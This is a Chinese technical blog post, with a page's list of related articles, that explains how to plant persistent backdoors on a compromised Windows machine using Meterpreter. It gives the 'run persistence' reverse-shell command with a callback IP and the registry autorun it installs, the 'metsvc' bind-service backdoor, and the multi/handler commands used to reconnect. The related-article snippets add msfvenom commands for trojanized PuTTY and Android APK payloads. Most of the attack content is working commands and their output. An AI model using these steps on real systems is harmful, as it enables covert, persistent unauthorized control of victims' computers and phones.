Meterpreter 建立持久后门 backdoor

最新推荐文章于 2023-05-05 11:13:45 发布
最新推荐文章于 2023-05-05 11:13:45 发布
阅读量9.7k 收藏 23
点赞数 4
分类专栏: kali msf 渗透
kali 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
msf
3 篇文章 0 订阅
订阅专栏
渗透
3 篇文章 0 订阅
订阅专栏

安装后门方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108


Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

^9 b5 q" j
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件上面的vbs的确存在


  注释,反弹时间间隔是5s  端口是443 Metasploit服务器Ip是192.168.0.108,缺点是容易被杀毒软件查杀|9 y$ t
3 X' c  d)W  l$ s
安装后门方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...

>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后门如何利用啊?
   msf > use exploit/multi/handler
   msf  exploit(handler) > set payload windows/metsvc_bind_tcp
   msf  exploit(handler) > set LPORT 31337
   msf  exploit(handler) > set RHOST 192.168.200.140

msf  exploit(handler)> exploit

盗才生
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【THM】Metasploit:Meterpreter-初级渗透测试
追风少年亚索的博客
04-10 855
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
Meterpreter 控制持久
Epsilon
03-01 6109
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
Meterpreter Backdoor
AI.PLAY
06-19 716
Install Backdoormeterpreter >run metsvc Creating ameterpreter service on port 31337 Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm... >>Uploading metsrv.dll.
通过meterpreter留nc后门
Yale的博客
01-27 1958
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6121
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
6.1 meterpreter创建后门
robacco的博客
07-31 632
1、使用msfvenom捆绑putty.exe程序,生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能,当运行后门程序的同时,将运行攻击载荷。 msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...
backdoor:后门调试的微型工具
07-13
后门Backdoor.js 是一个简单而有用的的微型助手。 在某个函数作用域中创建一个后门,然后访问该作用域或其父作用域中可用的对象。 $ npm install backdoor你可以通过 npm 和 require('backdoor') 安装它,或者在你的...
backdoor:锻炼你的后门
06-19
后门 在本练习中,您必须编写 auth 函数 (auth.c) 以便所有测试都通过。 auth() 函数必须返回用户 access_lvl 与其链接的所有组之间的最高 access_lvl。 这很简单。 但有趣的是,您还必须添加一个后门,让您获得比...
backdoor后门
04-02
backdoor后门backdoor后门
backdoor:用Go编写的后门
05-01
后门 用Go编写的后门 为什么? 好吧,有一天我爷爷给我打电话,他大喊大叫并诅咒了,导致该死的m&^#^%@ ^国王计算机重启导致更新了一些Flash程序(以及@&!&@ ^ $!IU @%是什么)无论如何还是Flash ?!),...
yajing2 Backdoor 反向后门代码
02-18
yajing backdoor v1.0久违了好多年以后,我做了一个反向的能彻底隐藏自身的PIPE后门程序yajing2,支持24条基本命令,她的附加资源包能在入侵内网的情况下,压缩下载大数据量的文件,附加了HTTP,SOCKS4,...
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2443
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
20202411 2022-2023-2 《网络与系统攻防技术》实验二实验报告
01学得好,从入门到吃饱
03-23 374
ARM架构大冤种认清了x86的世界,垂死挣扎一天半完成实验,发现原来是自己想太多找罪受
12.3、后渗透测试--持久后门
无痕的博客
12-13 2127
metasploit后渗透测试--持久后门
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5581
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
热门推荐
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
Kali之Metasploit生成apk后门控制安卓
weixin_30689307的博客
02-08 2315
扫盲教程,大佬勿喷。 实验中请更改为你环境的IP。 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊 root@kali:~# msfvenom -p android/meterpreter/reverse_tcp...
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
monitor_control.restrict_backdoor
最新发布
09-17
monitor_control.restrict_backdoor是一种监控控制功能,用于限制后门的存在和使用。 在计算机系统中,后门是指由开发人员或黑客留下的一种隐藏程序或功能,可以绕过正常的安全认证和访问控制,从而非法进入系统或获取敏感信息。后门可能会对系统安全性和用户隐私造成严重威胁。 为了防止后门的存在和滥用,monitor_control.restrict_backdoor功能被引入。这个功能可以在系统层面进行控制,限制和监控对后门的访问。具体而言,该功能可以检测并阻止未经授权的后门访问,包括识别并拦截恶意程序或恶意活动。通过对后门的监控和限制,该功能可以提高系统的安全性和防御能力。 monitor_control.restrict_backdoor通过以下几个方面来实现对后门的限制: 1. 检测:该功能可以监测系统中的所有后门,并实时地进行识别和检查。这样可以及时发现后门的存在,并采取相应的措施。 2. 阻止:一旦发现后门的存在,该功能可以立即采取措施,阻止后门的进一步使用和滥用。这样可以避免后门给系统和用户带来潜在的风险和威胁。 3. 记录:该功能可以对后门的使用进行记录和审计。这样可以追踪后门的创建者和使用者,及时发现和处理潜在的安全问题。 总之,monitor_control.restrict_backdoor是一项重要的系统功能,它可以有效地限制和监控后门的存在和使用。通过加强对后门的检测、阻止和记录,该功能可以提高系统的安全性,并对系统进行全面的保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值